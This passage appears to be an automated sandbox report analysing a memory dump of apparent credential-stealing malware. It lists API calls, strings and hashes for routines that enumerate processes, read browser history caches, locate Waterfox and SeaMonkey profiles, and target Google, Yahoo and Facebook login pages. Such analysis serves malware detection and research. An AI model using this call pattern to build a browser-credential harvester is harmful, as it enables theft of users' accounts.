                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                        • free.MSVCRT ref: 00413EC1
                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                        • API String ID: 3957639419-1740548384
                                                                                                                                        • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                        • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                          • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                          • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                        • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                        • String ID: bhv
                                                                                                                                        • API String ID: 4234240956-2689659898
                                                                                                                                        • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                        • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                        • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                        • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                        • __p__commode.MSVCRT ref: 00446785
                                                                                                                                        • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                        • _initterm.MSVCRT ref: 004467C7
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                        • _initterm.MSVCRT ref: 004467FD
                                                                                                                                        • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                        • exit.MSVCRT ref: 00446897
                                                                                                                                        • _cexit.MSVCRT ref: 0044689D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2791496988-0
                                                                                                                                        • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                        • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                        • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                        • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 0040C298
                                                                                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                        • wcschr.MSVCRT ref: 0040C324
                                                                                                                                        • wcschr.MSVCRT ref: 0040C344
                                                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                        • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                        • String ID: visited:
                                                                                                                                        • API String ID: 2470578098-1702587658
                                                                                                                                        • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                        • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                        • memset.MSVCRT ref: 0040E1BD
                                                                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                        • free.MSVCRT ref: 0040E28B
                                                                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                        • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                        • API String ID: 2804212203-2982631422
                                                                                                                                        • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                        • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                        • memset.MSVCRT ref: 0040BC75
                                                                                                                                        • memset.MSVCRT ref: 0040BC8C
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                        • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 115830560-3916222277
                                                                                                                                        • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                        • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                        • String ID: r!A
                                                                                                                                        • API String ID: 2791114272-628097481
                                                                                                                                        • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                        • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                        • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                        • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                        • API String ID: 2936932814-4196376884
                                                                                                                                        • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                        • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                        • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                        • String ID: BIN
                                                                                                                                        • API String ID: 1668488027-1015027815
                                                                                                                                        • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                        • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 00403CBF
                                                                                                                                        • memset.MSVCRT ref: 00403CD4
                                                                                                                                        • memset.MSVCRT ref: 00403CE9
                                                                                                                                        • memset.MSVCRT ref: 00403CFE
                                                                                                                                        • memset.MSVCRT ref: 00403D13
                                                                                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                        • memset.MSVCRT ref: 00403DDA
                                                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                        • API String ID: 4039892925-11920434
                                                                                                                                        • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                        • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                        • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                        • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 00403E50
                                                                                                                                        • memset.MSVCRT ref: 00403E65
                                                                                                                                        • memset.MSVCRT ref: 00403E7A
                                                                                                                                        • memset.MSVCRT ref: 00403E8F
                                                                                                                                        • memset.MSVCRT ref: 00403EA4
                                                                                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                        • memset.MSVCRT ref: 00403F6B
                                                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                        • API String ID: 4039892925-2068335096
                                                                                                                                        • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                        • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 00403FE1
                                                                                                                                        • memset.MSVCRT ref: 00403FF6
                                                                                                                                        • memset.MSVCRT ref: 0040400B
                                                                                                                                        • memset.MSVCRT ref: 00404020
                                                                                                                                        • memset.MSVCRT ref: 00404035
                                                                                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
